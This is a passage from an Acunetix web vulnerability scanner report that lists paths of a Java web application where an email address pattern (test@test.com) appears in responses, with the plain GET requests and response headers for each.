<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/test/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/test/o8HmpIgPmk.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/test/o8HmpIgPmk.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/test/o8HmpIgPmk.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:19:23 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/user/8P4Lnv3DgQ.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/user/8P4Lnv3DgQ.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/user/8P4Lnv3DgQ.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:50 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/user/account/2ZMPGIwwrD.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/user/account/2ZMPGIwwrD.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:80px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/user/account/2ZMPGIwwrD.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:28 GMT</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">47</td>
</tr>
</table>
<a name="PageN48"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:15px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/displayAccount</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/account/displayAccount HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Content-Length: 7563<br>Date: Sun, 26 Feb 2012 03:14:14 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/displayAccountDetails</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/account/displayAccountDetails HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/account/displayAccount<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:15 GMT<br>Content-Length: 13640</td>
</tr>
<tr style="height:13px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">48</td>
</tr>
</table>
<a name="PageN49"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/displayAccountPassword</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/account/displayAccountPassword HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/account/displayAccount<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Content-Length: 7812<br>Date: Sun, 26 Feb 2012 03:14:15 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/updateUserDetails</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/account/updateUserDetails HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/account/displayAccountDetails<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:98px">
<td colspan="19" class="s43">HTTP/1.1 500 Internal Server Error<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:15 GMT<br>Connection: close<br>Content-Length: 6979</td>
</tr>
<tr style="height:59px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">49</td>
</tr>
</table>
<a name="PageN50"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/updateUserPassword</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/account/updateUserPassword HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/account/displayAccountPassword<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Content-Length: 7840<br>Date: Sun, 26 Feb 2012 03:14:15 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/order/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/user/order/bMGktjPv3R.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/user/order/bMGktjPv3R.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/user/order/bMGktjPv3R.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:12 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/order/displayInvoice</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:35px">
<td colspan="19" class="s43">GET /yuliana/user/order/displayInvoice HTTP/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">50</td>
</tr>
</table>
<a name="PageN51"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:165px">
<td colspan="19" class="s43">Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/cart/displayCart<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Content-Length: 7115<br>Date: Sun, 26 Feb 2012 03:14:08 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/order/displayUserCart</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/order/displayUserCart HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/cart/displayCart<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:10 GMT<br>Content-Length: 8748</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/review/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/user/review/k72KV84XHq.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:79px">
<td colspan="19" class="s43">GET /yuliana/user/review/k72KV84XHq.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">51</td>
</tr>
</table>
<a name="PageN52"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:45px">
<td colspan="19" class="s43">Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/user/review/k72KV84XHq.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:10 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/review/addReview</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/review/addReview HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/review/displayReview<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:10 GMT<br>Content-Length: 8218</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/review/displayReview</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/review/displayReview HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/catalog/displayProduct<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">52</td>
</tr>
</table>
<a name="PageN53"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Content-Length: 8182<br>Date: Sun, 26 Feb 2012 03:14:10 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/validation/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/user/validation/3vu0E3B9z3.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/user/validation/3vu0E3B9z3.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/user/validation/3vu0E3B9z3.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:52 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/validation/j_security_check</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/validation/j_security_check HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/validation/validateUser<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/user/validation/j_security_check<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:04 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:93px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">53</td>
</tr>
</table>
<a name="PageN54"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/validation/validateUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">GET /yuliana/user/validation/validateUser HTTP/1.1<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Connection: Keep-alive<br>Host: 134.154.14.153:8080<br>Referer: http://134.154.14.153:8080/yuliana/user/validation/j_security_check</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Content-Length: 7221<br>Date: Sun, 26 Feb 2012 03:14:04 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/userAccess.jsp</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/userAccess.jsp HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 6993<br>Date: Sun, 26 Feb 2012 03:14:14 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/validation/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/validation/i9GOkSKFGS.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:19px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">54</td>
</tr>
</table>
<a name="PageN55"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
